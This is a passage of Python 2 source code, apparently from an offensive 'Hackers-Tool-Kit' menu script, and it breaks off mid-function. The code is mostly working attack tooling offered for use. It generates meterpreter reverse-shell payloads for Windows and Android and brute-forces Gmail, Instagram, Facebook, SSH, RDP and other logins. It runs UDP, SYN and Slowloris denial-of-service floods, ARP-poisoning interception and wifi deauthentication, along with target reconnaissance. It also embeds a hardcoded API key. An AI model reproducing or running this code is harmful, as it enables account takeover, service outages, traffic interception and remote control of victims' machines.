.:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arppois : ARP poisoning | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - show = 'macchanger -s {0}'.format(k) - os.system(show) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() 